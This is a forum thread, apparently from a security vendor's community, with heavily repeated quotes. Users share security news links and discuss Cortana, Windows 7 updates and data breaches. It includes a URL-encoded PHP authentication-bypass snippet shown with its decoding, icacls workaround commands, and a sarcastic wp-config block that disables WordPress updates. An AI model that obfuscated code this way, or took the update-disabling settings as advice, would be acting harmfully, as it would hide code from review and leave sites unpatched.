https://www.symantec.com/blogs/threat-intelligence/vpnfilter-iot-malware
-
10 unsafe plug-ins for webshops' Word Press locked:
https://blog.threatpress.com/vulnerable-wordpress-plugins-multidots/
Webshops sites that haven't these vulnerable plug-ins disabled still vulnerable.
polonus
-
Attack Vectors in Orbit: The Need for IoT and Satellite Security in the Age of 5G
https://blog.trendmicro.com/trendlabs-security-intelligence/attack-vectors-in-orbit-need-for-satellite-security-in-5g-iot/
-
U.S. lawmakers want Google to reconsider links to China's Huawei
https://www.reuters.com/article/us-usa-china-congress-alphabet/u-s-lawmakers-want-google-to-reconsider-links-to-chinas-huawei-idUSKBN1JG2YK (https://www.reuters.com/article/us-usa-china-congress-alphabet/u-s-lawmakers-want-google-to-reconsider-links-to-chinas-huawei-idUSKBN1JG2YK)
-
Microsoft Stops Cortana From Giving People Access To Your PC
https://www.tomshardware.com/news/microsoft-update-cortana-security-vulnerability,37297.html (https://www.tomshardware.com/news/microsoft-update-cortana-security-vulnerability,37297.html)
-
Microsoft Stops Cortana From Giving People Access To Your PC
https://www.tomshardware.com/news/microsoft-update-cortana-security-vulnerability,37297.html (https://www.tomshardware.com/news/microsoft-update-cortana-security-vulnerability,37297.html)
Personally I hated the Cortana idea right from the start and it had nothing to do with this potential security breach. I just hated the concept of Cortana digging into your every orifice gathering data.
Right from the start on my windows10 system I sought to curtail Cortana, e.g. I would love to be able to completely disable it.
Not so long ago people were considered bonkers when talking to inanimate objects :)
I don't particularly like the concept of using OK Google either, or Amazons daft speaker Alexa.
-
Microsoft Stops Cortana From Giving People Access To Your PC
https://www.tomshardware.com/news/microsoft-update-cortana-security-vulnerability,37297.html (https://www.tomshardware.com/news/microsoft-update-cortana-security-vulnerability,37297.html)
Personally I hated the Cortana idea right from the start and it had nothing to do with this potential security breach. I just hated the concept of Cortana digging into your every orifice gathering data.
Right from the start on my windows10 system I sought to curtail Cortana, e.g. I would love to be able to completely disable it.
Not so long ago people were considered bonkers when talking to inanimate objects :)
I don't particularly like the concept of using OK Google either, or Amazons daft speaker Alexa.
I happen to use and enjoy both Alexa and Ok or Hey Google. :)
https://youtu.be/sgNIcKHlqrY (https://youtu.be/sgNIcKHlqrY)
-
Microsoft Stops Cortana From Giving People Access To Your PC
https://www.tomshardware.com/news/microsoft-update-cortana-security-vulnerability,37297.html (https://www.tomshardware.com/news/microsoft-update-cortana-security-vulnerability,37297.html)
Personally I hated the Cortana idea right from the start and it had nothing to do with this potential security breach. I just hated the concept of Cortana digging into your every orifice gathering data.
Right from the start on my windows10 system I sought to curtail Cortana, e.g. I would love to be able to completely disable it.
Not so long ago people were considered bonkers when talking to inanimate objects :)
I don't particularly like the concept of using OK Google either, or Amazons daft speaker Alexa.
I happen to use and enjoy both Alexa and Ok or Hey Google. :)
https://youtu.be/sgNIcKHlqrY (https://youtu.be/sgNIcKHlqrY)
Assuming I had them, the only question for Alexa, OK Google or Cortana would be 'How do I turn/switch you off.'
I just wonder what the answer would be :)
-
Microsoft Stops Cortana From Giving People Access To Your PC
https://www.tomshardware.com/news/microsoft-update-cortana-security-vulnerability,37297.html (https://www.tomshardware.com/news/microsoft-update-cortana-security-vulnerability,37297.html)
Personally I hated the Cortana idea right from the start and it had nothing to do with this potential security breach. I just hated the concept of Cortana digging into your every orifice gathering data.
Right from the start on my windows10 system I sought to curtail Cortana, e.g. I would love to be able to completely disable it.
Not so long ago people were considered bonkers when talking to inanimate objects :)
I don't particularly like the concept of using OK Google either, or Amazons daft speaker Alexa.
I happen to use and enjoy both Alexa and Ok or Hey Google. :)
https://youtu.be/sgNIcKHlqrY (https://youtu.be/sgNIcKHlqrY)
Assuming I had them, the only question for Alexa, OK Google or Cortana would be 'How do I turn/switch you off.'
I just wonder what the answer would be :)
Just ask them and you'll see. ;D
-
<snip quotes>
Assuming I had them, the only question for Alexa, OK Google or Cortana would be 'How do I turn/switch you off.'
I just wonder what the answer would be :)
Just ask them and you'll see. ;D
It is a little like prodding a sleeping lion, or Snake :) excuse the pun.
I haven't got any Alexa stuff (and no intention of getting any), I have done as much as I can in Windows 10 to prevent Cortana, gathering data and likewise Google ;)
-
<snip quotes>
Assuming I had them, the only question for Alexa, OK Google or Cortana would be 'How do I turn/switch you off.'
I just wonder what the answer would be :)
Just ask them and you'll see. ;D
It is a little like prodding a sleeping lion, or Snake :) excuse the pun.
I haven't got any Alexa stuff (and no intention of getting any), I have done as much as I can in Windows 10 to prevent Cortana, gathering data and likewise Google ;)
Deactivating Cortana was the first thing, I did, for I wasn't able to stand Cortanas talking. ;D
-
<snip quotes>
Assuming I had them, the only question for Alexa, OK Google or Cortana would be 'How do I turn/switch you off.'
I just wonder what the answer would be :)
Just ask them and you'll see. ;D
It is a little like prodding a sleeping lion, or Snake :) excuse the pun.
I haven't got any Alexa stuff (and no intention of getting any), I have done as much as I can in Windows 10 to prevent Cortana, gathering data and likewise Google ;)
Deactivating Cortana was the first thing, I did, for I wasn't able to stand Cortanas talking. ;D
You should have picked a different voice. These are things that vary from user to user.
I have no problems using Cortana or Google voice etc. Just set your own restrictions.
-
Microsoft unexpectedly drops Windows 7 support for some ancient CPUs
https://www.zdnet.com/article/microsoft-unexpectedly-drops-windows-7-support-for-some-ancient-cpus/ (https://www.zdnet.com/article/microsoft-unexpectedly-drops-windows-7-support-for-some-ancient-cpus/)
-
Unpatched security hole in Word Press CMS revealed:
https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/
polonus
-
New Windows 10 vulnerability bypasses OS defenses, says security researcher
https://www.techrepublic.com/article/new-windows-10-vulnerability-bypasses-os-defenses-says-security-researcher/ (https://www.techrepublic.com/article/new-windows-10-vulnerability-bypasses-os-defenses-says-security-researcher/)
-
Microsoft unexpectedly drops Windows 7 support for some ancient CPUs
https://www.zdnet.com/article/microsoft-unexpectedly-drops-windows-7-support-for-some-ancient-cpus/ (https://www.zdnet.com/article/microsoft-unexpectedly-drops-windows-7-support-for-some-ancient-cpus/)
Thanks, mchain, for that link. Now I know, why I needed 4 W7-installations caused by important updates!!!
Shame on those, who do things like that!
-
@ =Snake=,
Consider yourself lucky to be able to run what amounts to a museum piece. :) I lost my Pentium III's a long time ago, PSU burnouts. Besides, nothing lasts anyway.
-
Microsoft ends support for Windows 7 and 8.1 on the Microsoft forums. Security update support for Windows 7 ends on Jan 14th 2020, while for Windows 8.1 one could reckon with updates until Jan 10th 2023, when it sounds likely that Microsoft might no longer exist by that time.
It is to be understood, that Microsoft and hardware firms will decide on what hardware and drivers are still available and what goes obsolete over time, as marketing strategies get more and more relentless all the time.
Probably our friend, =Snake=, has now landed in that respect between Scylla and Charybdis or as they say in the USA "between a rock and a hard stone". That for using the Windows platform for almost half a century :o
polonus
-
NSA deletes scores of call records over ‘technical irregularities’
http://thehill.com/policy/cybersecurity/394791-nsa-deletes-scores-of-call-records-over-technical-irregularities (http://thehill.com/policy/cybersecurity/394791-nsa-deletes-scores-of-call-records-over-technical-irregularities)
-
Probably our friend, =Snake=, has now landed in that respect between Scylla and Charybdis or as they say in the USA "between a rock and a hard stone". That for using the Windows platform for almost half a century :o
Yes, indeed. Right now, I installed W7 the 6th time with only 9 updates including SP1.
BTW: DJBone helped to download and install the full version of 'W7 SP1 update pack 2.88
32bit' from WinFuture. Download and installation were ok, but until now, I couldn't find
the 273 updates from there!!!
::)
=Snake=
-
Probably our friend, =Snake=, has now landed in that respect between Scylla and Charybdis or as they say in the USA "between a rock and a hard stone". That for using the Windows platform for almost half a century :o
Yes, indeed. Right now, I installed W7 the 6th time with only 9 updates including SP1.
BTW: DJBone helped to download and install the full version of 'W7 SP1 update pack 2.88
32bit' from WinFuture. Download and installation were ok, but until now, I couldn't find
the 273 updates from there!!!
::)
=Snake=
I've a suspicion you can also find your 273 updates here: https://www.catalog.update.microsoft.com/Search.aspx?q=Windows%207 (https://www.catalog.update.microsoft.com/Search.aspx?q=Windows%207)
-
Probably our friend, =Snake=, has now landed in that respect between Scylla and Charybdis or as they say in the USA "between a rock and a hard stone". That for using the Windows platform for almost half a century :o
Yes, indeed. Right now, I installed W7 the 6th time with only 9 updates including SP1.
BTW: DJBone helped to download and install the full version of 'W7 SP1 update pack 2.88
32bit' from WinFuture. Download and installation were ok, but until now, I couldn't find
the 273 updates from there!!!
I've a suspicion you can also find your 273 updates here: https://www.catalog.update.microsoft.com/Search.aspx?q=Windows%207 (https://www.catalog.update.microsoft.com/Search.aspx?q=Windows%207)
Sorry, mchain, but I don't know, how you mean it, for the 273 updates are already installed, but I don't see them in 'installed updates! Why?
-
Using Microsoft Update Catalog is meant to be a manual way of updating your system(s). You'd be able to download each update you require and save each one for future use, should you ever have need of them again.
I think you are saying you already have the 273 updates installed but they are not showing in Win 7 Updates. Correct?
-
I think you are saying you already have the 273 updates installed but they are not showing in Win 7 Updates. Correct?
Yes.
-
Using Microsoft Update Catalog is meant to be a manual way of updating your system(s). You'd be able to download each update you require and save each one for future use, should you ever have need of them again.
I think you are saying you already have the 273 updates installed but they are not showing in Win 7 Updates. Correct?
I think you would be much better off doing this:
https://www.howtogeek.com/255540/the-last-windows-7-iso-youll-ever-need-how-to-slipstream-the-convenience-rollup/
-
I think you would be much better off doing this:
https://www.howtogeek.com/255540/the-last-windows-7-iso-youll-ever-need-how-to-slipstream-the-convenience-rollup/
Thanks, Bob, for the link, but I don't trust MS anymore. Who can tell, if there's everything ok with?
-
I think you would be much better off doing this:
https://www.howtogeek.com/255540/the-last-windows-7-iso-youll-ever-need-how-to-slipstream-the-convenience-rollup/ (https://www.howtogeek.com/255540/the-last-windows-7-iso-youll-ever-need-how-to-slipstream-the-convenience-rollup/)
Thanks, Bob, for the link, but I don't trust MS anymore. Who can tell, if there's everything ok with?
If you don't trust MS, why are you using Windows ???
-
I think you would be much better off doing this:
https://www.howtogeek.com/255540/the-last-windows-7-iso-youll-ever-need-how-to-slipstream-the-convenience-rollup/ (https://www.howtogeek.com/255540/the-last-windows-7-iso-youll-ever-need-how-to-slipstream-the-convenience-rollup/)
Thanks, Bob, for the link, but I don't trust MS anymore. Who can tell, if there's everything ok with?
If you don't trust MS, why are you using Windows ???
Now you're unpolite. But (if you want) see my sig. :-X
-
I think you would be much better off doing this:
https://www.howtogeek.com/255540/the-last-windows-7-iso-youll-ever-need-how-to-slipstream-the-convenience-rollup/ (https://www.howtogeek.com/255540/the-last-windows-7-iso-youll-ever-need-how-to-slipstream-the-convenience-rollup/)
Thanks, Bob, for the link, but I don't trust MS anymore. Who can tell, if there's everything ok with?
If you don't trust MS, why are you using Windows ???
Now you're unpolite. But (if you want) see my sig. :-X
That's not un-polite. You made the comment that you don't trust Microsoft.
-
A persistent threat that cannot be underestimated by av and cybersecurity forces alike,
and should be analyzed, namely Nation State's APT Advanced Persistent Adware:
Read all about this here:
https://www.boozallen.com/s/insight/blog/advanced-persistent-adware.html
At the base of this is Advanced JavaScript-Based In-Memory Stage 1 Downloader (fully obfuscated).
From that story additional code retrieved from the C2 server is advanced and and given its ability to execute arbitrary code could be used as an implant for exfiltrating data and receiving further tasking outside of its adware capabilities.
Any adware provider could be hijacked for such nefarious state hacker's purposes.
The more reason for you all to work a third party script blocker and adblocker alike.
I write this post to you in Cliqz with one private data point being removed on this very page where I am writing,
polonus (volunteer website security analyst and website error-hunter)
-
Internet Explorer from inadequate patch to fuller patch:
http://blogs.360.cn/blog/from-a-patched-itw-0day-to-remote-code-execution-part-i-from-patch-to-new-0day/
polonus
-
Vulnerability Note VU#304725 - Bluetooth implementations may not sufficiently validate elliptic curve parameters during Diffie-Hellman key exchange
https://www.kb.cert.org/vuls/id/304725
-
Scam alert! Don’t fall for this webcam extortion ploy
https://blog.avast.com/scam-alert-dont-fall-for-extortion-ploy
-
Scam alert! Don’t fall for this webcam extortion ploy
https://blog.avast.com/scam-alert-dont-fall-for-extortion-ploy
Ha, just like those that have been appearing in the forums. I just wonder if these hadn't initiated the blog article.
-
Vulnerability Note VU#304725 - Bluetooth implementations may not sufficiently validate elliptic curve parameters during Diffie-Hellman key exchange
https://www.kb.cert.org/vuls/id/304725
Bluetooth flaw allows man-in-the-middle attacks
https://blog.avast.com/bluetooth-security-flaw
-
Ha der Asyn,
This just after we had KRACK and BlueBorn on android.
But there has been security problems since the introduction of King Harald Bluetooth protocol, so since 1989.
Most vulnerable Bluetooth is at installing a new Bluetooth device during the so-called "pairing".
Read: https://www.makeuseof.com/tag/3-ways-bluetooth-device-security-risk/
Read: https://cs.stanford.edu/people/eroberts/courses/soco/projects/2003-04/wireless-computing/sec_bluetooth.shtml
For encryption glitches: http://colinoflynn.com/2016/11/philips-hue-aes-ccm-and-more/
S.G.
polonus
-
A malvertising campaign on thousands of WordPress websites:
https://research.checkpoint.com/malvertising-campaign-based-secrets-lies/
And again redirects to AdsTerra seem to be involved.
polonus
-
The Need for Managed Detection and Response: Persistent and Prevalent Threats in North America’s Security Landscape
https://blog.trendmicro.com/trendlabs-security-intelligence/the-need-for-managed-detection-and-response-persistent-and-prevalent-threats-in-north-americas-security-landscape/
-
The Need for Managed Detection and Response: Persistent and Prevalent Threats in North America’s Security Landscape
https://blog.trendmicro.com/trendlabs-security-intelligence/the-need-for-managed-detection-and-response-persistent-and-prevalent-threats-in-north-americas-security-landscape/ (https://blog.trendmicro.com/trendlabs-security-intelligence/the-need-for-managed-detection-and-response-persistent-and-prevalent-threats-in-north-americas-security-landscape/)
The difference between this report from Trend Micro and the one from Avast is the product recommended to protect you from this dangerous landscape.
I prefer the software recommended by Avast. :)
-
A malvertising campaign on thousands of WordPress websites:
https://research.checkpoint.com/malvertising-campaign-based-secrets-lies/
And again redirects to AdsTerra seem to be involved.
polonus
Malvertising in plain sight
https://blog.avast.com/malvertising-in-plain-sight
-
[Reddit] - We had a security incident. Here's what you need to know.
https://www.reddit.com/r/announcements/comments/93qnm5/we_had_a_security_incident_heres_what_you_need_to/
-
Hi Asyn,
Various ways the cybercriminals could have hacked their criminal way in:
1. https://motherboard.vice.com/en_us/article/a3q7mz/hacker-allegedly-stole-millions-bitcoin-sim-swapping
2. https://motherboard.vice.com/en_us/article/j5bpg7/sim-hijacking-t-mobile-stories
Weaknesses of SS7: 3. https://secure-voice.com/ss7_attacks/
2 second factor authentication could be protocol-dependant: 4. https://pages.nist.gov/800-63-3/sp800-63b.html#out-of-band
Krebs also wrote on it: 5. https://krebsonsecurity.com/2018/08/reddit-breach-highlights-limits-of-sms-based-authentication/
Way to perform this 6. https://www.theguardian.com/technology/2016/apr/19/ss7-hack-explained-mobile-phone-vulnerability-snooping-texts-calls.
Question of malware installed on the device or many firms will send out SMS through an external party, that delivers it again to a mobile network. The connection to that external 3rd party could be simply hacked than the protocol itself (through technology and also via an inside job for instance). Reddit will now use two factor tokenization authentication, because once bitten means now twice shy. ::) :o
polonus
-
Still too many (big) websites, that fall victim to this threat, SQL-injection:
https://codecurmudgeon.com/wp/sql-injection-hall-of-shame/
Examples from main CMS softwares, based on PHP, WordPress & Drupal - update to most recent versions
Latest vulnerability caused WP and Drupal to update:
https://symfony.com/blog/cve-2018-14773-remove-support-for-legacy-and-risky-http-headers
Re: https://framework.zend.com/security/advisory/ZF2018-01
For those unwise that know such CMS to be insecure by design,
and that do not wanna update automatically, put this inside your wp-config.php ;) ::)
// Disable all automatic updates
define( 'AUTOMATIC_UPDATER_DISABLED', true );
define( 'WP_AUTO_UPDATE_CORE', false );
define( 'DISALLOW_FILE_MODS', true );
define('DISALLOW_FILE_EDIT', true); :o
polonus (volunteer website security analyst and website error-hunter)
-
HPSBHF03589 rev. 2 - HP Ink Printers Remote Code Execution
https://support.hp.com/us-en/document/c06097712
-
Instagram has been #hacked
https://blog.avast.com/hackers-attack-instagram
-
23 security extensions removed from firefox: https://blocked.cdn.mozilla.net/96b2e7d5-d4e4-425e-b275-086dc7ccd6ad.html
Extensions were Web Security and also from the same group of developers Browser Security, Browser Privacy and Browser Safety, also YouTube MP3 Converter, Dirty Little Helpers & Video Downloader.
Extensions were blocked because they could send certain browser user data to remote servers, also remote code could be executed inside the browser.
polonus
-
Impact of the so-called foreshadowing flaw inside Intel processors.
What was not discussed is the impact of the foreshadowing bug for future developments for cryptocurrency:
https://www.coindesk.com/what-intels-foreshadow-flaw-means-for-the-future-of-cryptocurrency/
Moxie Marlinspike's MobilCoin project with SGX in a prominent role, now should be postponed for the time being.
That is a bad thing for an initiative that tries to create a more eco-friendly alternative to gigantic energy-consuming "mining". SGX as a new a new way of saving private keys now is put on hold for a while.
It is a good thing a fix for that particular flaw was ready by Intel a few months before the flaw was openly disclosed, but as the mitigation and patches are slow to be implemented overall, we still will be confronted with a vulnerable infrastructure for quite some time.
"Trusted hardware". We have to wait a while when we can talk about real "trusted hardware" again.
Root causes for such problems are big commerce with almost murderous processor competition.
polonus
-
Gaping Ghostscript hole let attackers perform commands remotely!
Re: http://openwall.com/lists/oss-security/2018/08/21/2
Read: https://www.kb.cert.org/vuls/id/332928
polonus
-
Explorer (IE) vulnerability > CVE-2018-8373
https://blog.trendmicro.com/trendlabs-security-intelligence/use-after-free-uaf-vulnerability-cve-2018-8373-in-vbscript-engine-affects-internet-explorer-to-run-shellcode/
" Internet Explorer 11 is not vulnerable since VBScript in Windows 10 Redstone 3 (RS3) has been effectively disabled by default."
-
Australia bans China's Huawei from 5G mobile network, angers Beijing
https://www.reuters.com/article/us-australia-china-huawei-tech/australia-bans-chinas-huawei-from-5g-mobile-network-angers-beijing-idUSKCN1L72GC (https://www.reuters.com/article/us-australia-china-huawei-tech/australia-bans-chinas-huawei-from-5g-mobile-network-angers-beijing-idUSKCN1L72GC)
-
Mirai-malware now also came to Android systems thanks to Aboriginal Linux:
https://www.symantec.com/blogs/threat-intelligence/mirai-cross-platform-infection.
The ease of a cross-platform broad compilation software malware.
Not only comfort for developers, also for the sneaky cyber-malcreant.
All can be tested under QUEMU, so also a real testbed for the cyber-criminal.
Project: https://github.com/landley/aboriginal
Easy peasy mirai everywhere.
polonus
-
On JavaScript projects with a 1 in 2 vulnerablity score:
https://www.theregister.co.uk/2018/08/22/npm_vulnerability_scanner/
Probably known from all I report via volunteer website security scanning and detected retirable jQuery code (also via SNYK)
and the JavaScript unpacker error reports I file there quite regularly.
JavaScript, it never became really secure since it came out first time in the previous century.
Block it using a combination of uMatrix and uBlock Origin or any other 3rd party script blocker (NoScrip[t) etc.
polonus
-
Gaping Ghostscript hole let attackers perform commands remotely!
Re: http://openwall.com/lists/oss-security/2018/08/21/2
Read: https://www.kb.cert.org/vuls/id/332928
-> https://bugs.chromium.org/p/project-zero/issues/detail?id=1640
-
Security updates available for Adobe Photoshop CC | APSB18-28
https://helpx.adobe.com/security/products/photoshop/apsb18-28.html
-
New gaping zero-day hole in Windows 10
Read: https://www.kb.cert.org/vuls/id/906424
Wait for the patch scheduled for the coming next patch round
Work around for the time being is: As the implementation is open source, so one can block this leak with:
icacls c:\windows\tasks /remove:g "Authenticated Users"
icacls c:\windows\tasks /deny system:(OI)(CI)(WD,WDAC)
Warning, this will block system rights to write unto your tasks and removes authenticated user rights in the tasks folder. This could possibly affect the functioning of planned tasks. In a short test everything worked still fine.
Info credits for this temp. fix go to Tweaker.net's Karsten88
polonus
-
PHP-based content management software is a continuous risk to use on websites like magento, WordPress etc.
Not everybody will fully patch, update, upgrade or configurate it properly, putting not only themselves but also others at risk.
"PEBKAC" mainly.
MagentoCore skimmer malware threats many Magento webshops:
Approx. 7300 webshops hacked so far!
Read:
https://gwillem.gitlab.io/2018/08/30/magentocore.net_skimmer_most_aggressive_to_date/
Also here: https://twitter.com/gwillem/status/1035119660277096448
So scan your shop's CMS at https://www.magereport.com/
polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
-
390.000 websites vulnerable world-wide according to the Vladimir Smitka scan:
https://lynt.cz/blog/global-scan-exposed-git
Hand your website code to a hacker and he/she can get at sensitive data all sorts
or what is secure code to-day may be vulnerable and hackable code to-morrow.
polonus
-
Five Eyes’ Nations Quietly Demand Government Access to Encrypted Data
https://www.nytimes.com/2018/09/04/us/politics/government-access-encrypted-data.html
https://www.homeaffairs.gov.au/about/national-security/five-country-ministerial-2018/access-evidence-encryption
-
Theft of Customer Data at British Airways
http://www.iairgroup.com/phoenix.zhtml?c=240949&p=irol-newsArticle_Print&ID=2366426
https://www.britishairways.com/en-gb/information/incident/data-theft/latest-information
-
Theft of Customer Data at British Airways
http://www.iairgroup.com/phoenix.zhtml?c=240949&p=irol-newsArticle_Print&ID=2366426
https://www.britishairways.com/en-gb/information/incident/data-theft/latest-information
A lot in the papers and the news in the UK about this today. They are already talking about financial penalties, something like a few million or 4% of turnover, whichever is higher and that could be as much as a few £billion.
Now would be the question where does this financial penalty go ?
I rather doubt it would go towards and fraudulent use of those customers card information, etc. They may well be able to try and get recovery from the banks for fraudulent use, but why should the banks be held liable or responsible.
-
7 Big Ways Online Rights Have Changed This Year
https://blog.mozilla.org/internetcitizen/2018/06/25/changes-to-online-rights/?utm_source=desktop-snippet&utm_medium=snippet&utm_campaign=OnlineRights&utm_term=9193&utm_content=REL&sample_rate=0.001&snippet_name=9193 (https://blog.mozilla.org/internetcitizen/2018/06/25/changes-to-online-rights/?utm_source=desktop-snippet&utm_medium=snippet&utm_campaign=OnlineRights&utm_term=9193&utm_content=REL&sample_rate=0.001&snippet_name=9193)
-
Phishing scam targets WordPress users
https://blog.avast.com/phishing-scam-targets-wordpress-users
-
Theft of Customer Data at British Airways
http://www.iairgroup.com/phoenix.zhtml?c=240949&p=irol-newsArticle_Print&ID=2366426
https://www.britishairways.com/en-gb/information/incident/data-theft/latest-information
A lot in the papers and the news in the UK about this today. They are already talking about financial penalties, something like a few million or 4% of turnover, whichever is higher and that could be as much as a few £billion.
Now would be the question where does this financial penalty go ?
I rather doubt it would go towards and fraudulent use of those customers card information, etc. They may well be able to try and get recovery from the banks for fraudulent use, but why should the banks be held liable or responsible.
380K British Airways transactions compromised in data breach
https://blog.avast.com/british-airways-hack-similar-to-ticketmaster-breach
-
Theft of Customer Data at British Airways
http://www.iairgroup.com/phoenix.zhtml?c=240949&p=irol-newsArticle_Print&ID=2366426
https://www.britishairways.com/en-gb/information/incident/data-theft/latest-information
A lot in the papers and the news in the UK about this today. They are already talking about financial penalties, something like a few million or 4% of turnover, whichever is higher and that could be as much as a few £billion.
Now would be the question where does this financial penalty go ?
I rather doubt it would go towards and fraudulent use of those customers card information, etc. They may well be able to try and get recovery from the banks for fraudulent use, but why should the banks be held liable or responsible.
380K British Airways transactions compromised in data breach
https://blog.avast.com/british-airways-hack-similar-to-ticketmaster-breach
Very interesting and scary article.
-
Security flaw in ‘nearly all’ modern PCs and Macs exposes encrypted data
https://techcrunch.com/2018/09/12/security-flaw-in-nearly-all-modern-pcs-and-macs-leaks-encrypted-data/?guccounter=1
The Chilling Reality of Cold Boot Attacks >> https://blog.f-secure.com/cold-boot-attacks/
-
Attack Landscape of 2018, So Far
https://blog.f-secure.com/attack-landscape-2018-far/
-
L.S.
Content injection vulnerability via install.php in outdated Duplicator Word-Press plug-in:
Read https://blog.sucuri.net/2018/09/outdated-duplicator-plugin-rce-abused.html
Weakness: https://github.com/vichan-devel/vichan/issues/284
Word Press vuln. https://secure.wphackedhelp.com/blog/wordpress-vulnerabilities-how-to-fix-guide-tools/
The wp-config.php-file should be checked or reinstalled when overwritten through this plug-in hole.
PHP weaknesses and bad word press configuration will facilitate such attacks.
Still loads of WP websites with user enumeration set on enabled and directory listing enabled.
PHP-based Word Press CMS is not for the ill-instructed or n00bs, learn to configure properly and securely.
polonus (volunteer website security analyst and website error-hunter)
-
Peekaboo! They can see you!
https://blog.avast.com/nuuo-peekaboo-vulnerability-gives-hackers-your-camera-feed
-
Adguard attacked
https://adguard.com/en/blog/adguard-security-notice/
-
Word Press sites hacked to facilitate help desk fraud. :
https://blog.malwarebytes.com/threat-analysis/2018/09/mass-wordpress-compromises-tech-support-scams/
Scan: https://hackertarget.com/wordpress-security-scan/ and here: https://webhint.io/
PHP installs have an over 78% insecurity. WordPress, Drupal, Joomla and Magenta are PHP-based CMS.
Word Press is a CMS that comes without internal encryption, which makes it more insecure.
Read: https://developers.slashdot.org/story/14/12/31/002253/over-78-of-all-php-installs-are-insecure
Also: https://paragonie.com/blog/2017/12/2018-guide-building-secure-php-software
and https://paragonie.com/blog/2016/08/on-insecurity-popular-open-source-php-cms-platforms
polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
-
Magecart claims another victim in Newegg merchant data theft
https://www.zdnet.com/article/magecart-claims-another-victim-in-newegg-merchant-data-theft/
-
A Big Change in Chrome 69 can put you at risk
https://www.komando.com/happening-now/486524/a-big-change-in-chrome-69-can-put-you-at-risk (https://www.komando.com/happening-now/486524/a-big-change-in-chrome-69-can-put-you-at-risk)
To view/read relevant information, see topic listed below:
Big change in Chrome's address bar
Follow instructions on how to disable Default settings for chrome://flags/#omnibox-ui-hide-steady-state-url-scheme-and-subdomains
Apparently Avast Secure Browser 69.0 is affected as well.
[EDIT:] ASB may or may not be affected.
-
A Big Change in Chrome 69 can put you at risk
https://www.komando.com/happening-now/486524/a-big-change-in-chrome-69-can-put-you-at-risk (https://www.komando.com/happening-now/486524/a-big-change-in-chrome-69-can-put-you-at-risk)
To view/read relevant information, see topic listed below:
Big change in Chrome's address bar
Follow instructions on how to disable Default settings for chrome://flags/#omnibox-ui-hide-steady-state-url-scheme-and-subdomains
Apparently Avast Secure Browser 69.0 is affected as well.
[EDIT:] ASB may or may not be affected.
I personally have also applied that recommended change in the Avast Secure Browser.
Better safe than sorry. :)
-
Facebook Vulnerability Affecting 50 Million Users Allowed Account Takeover
https://www.bleepingcomputer.com/news/security/facebook-vulnerability-affecting-50-million-users-allowed-account-takeover/
https://newsroom.fb.com/news/2018/09/security-update/
-
Facebook Vulnerability Affecting 50 Million Users Allowed Account Takeover
https://www.bleepingcomputer.com/news/security/facebook-vulnerability-affecting-50-million-users-allowed-account-takeover/
https://newsroom.fb.com/news/2018/09/security-update/
Facebook security breach - what should you do?
https://blog.avast.com/facebook-security-breach-what-should-you-do
-
Popular CMS will still accept older PHP versions. T0-day Drupal will run with PHP 5.5.9. Joomla demands at least PHP 5.3 and WordPress still will accept PHP 5.2.4.
Always be aware for PHP vulnerabities like this authentication bypass - http://yaisb.blogspot.com/2006/08/authentication-bypass_07.html * could reapear encrypted <script> <!-- document.write(unescape("%3C%3F%0A%0Aif%28%21isset%28%24_SESSION%5B%27session%27%5D%5B%22privLvl%22%5D%29%29%20%7B%20%0A%20header%28%22Location%3A%20login.php%22%29%3B%0A%20exit%28%29%3B%0A%7D%0A%0Aecho%20%22BIG%20SECRET%21%22%3B%0A%0A%3F%3E")); //--> </script>
translating to //document.write (s) <? if(!isset($_SESSION['session']["privLvl"])) { header("Location: login.php"); exit(); } echo "BIG SECRET!"; ?>
code source credits go to: RYAN *
polonus
-
Kraken Cryptor Ransomware Connecting to BleepingComputer During Encryption
https://www.bleepingcomputer.com/news/security/kraken-cryptor-ransomware-connecting-to-bleepingcomputer-during-encryption/ (https://www.bleepingcomputer.com/news/security/kraken-cryptor-ransomware-connecting-to-bleepingcomputer-during-encryption/)
-
Remote Code Execution Flaws Found in Popular OS Powering Embedded Systems
https://www.bleepingcomputer.com/news/security/remote-code-execution-flaws-found-in-popular-os-powering-embedded-systems/ (https://www.bleepingcomputer.com/news/security/remote-code-execution-flaws-found-in-popular-os-powering-embedded-systems/)
-
Every time I create a web account I create a new email address which is forwarded to my real email address. I never use that email address for anything else. That way, if I get emails to that address that I should not, I know site is marketing my address or that they have been hacked.
I just received an email from a hacker warning of dire consequences if I don't pay big time. (I know it is not true but just a scam.) However the scam email was sent to an email address which has never been used for anything except to logon to this site. I have not used it for several years (until the scammer used it today.) My domain is one they would not likely try (it's something like ky7620z.com.) It is not very comforting that an antimalware site has been hacked like that.)
I have deleted the forwarder so the email address no longer exists. Avast needs to be more careful to protect its customers.
-
Every time I create a web account I create a new email address which is forwarded to my real email address. I never use that email address for anything else. That way, if I get emails to that address that I should not, I know site is marketing my address or that they have been hacked.
I just received an email from a hacker warning of dire consequences if I don't pay big time. (I know it is not true but just a scam.) However the scam email was sent to an email address which has never been used for anything except to logon to this site. I have not used it for several years (until the scammer used it today.) My domain is one they would not likely try (it's something like ky7620z.com.) It is not very comforting that an antimalware site has been hacked like that.)
I have deleted the forwarder so the email address no longer exists. Avast needs to be more careful to protect its customers.
Avast wasn't hacked. This forum was some years back - https://www.grahamcluley.com/avast-forum-hacked/
-
Every time I create a web account I create a new email address which is forwarded to my real email address. I never use that email address for anything else. That way, if I get emails to that address that I should not, I know site is marketing my address or that they have been hacked.
I just received an email from a hacker warning of dire consequences if I don't pay big time. (I know it is not true but just a scam.) However the scam email was sent to an email address which has never been used for anything except to logon to this site. I have not used it for several years (until the scammer used it today.) My domain is one they would not likely try (it's something like ky7620z.com.) It is not very comforting that an antimalware site has been hacked like that.)
I have deleted the forwarder so the email address no longer exists. Avast needs to be more careful to protect its customers.
The email scam you're describing sounds like the one that did the rounds not long ago, some guy reckons he's recorded you watching porn and has collected all your contacts and if you don't pay the ransom he'll forward the video to all your friends yada yada yada ::) I also got the same scam email which was an old email used for this forum 4 years ago, Avast did change their registration process after that hack to further prevent it happening again.
Unfortunately these forum hacks are happening more and more often, Malwarebytes was struck somewhere back around the same time as Avast, Adguard was hit only a few weeks ago also and just about all emails were pawned.
It's crazy how many Government offices and other businesses have been hit recently, sadly it's only going to get worse :(
-
Check your email here https://haveibeenpwned.com
-
BA website hijacked by Magecart. Again.
https://blog.avast.com/ba-website-hijacked-by-magecart-again
-
Flaws in self-encrypting SSDs let attackers bypass disk encryption
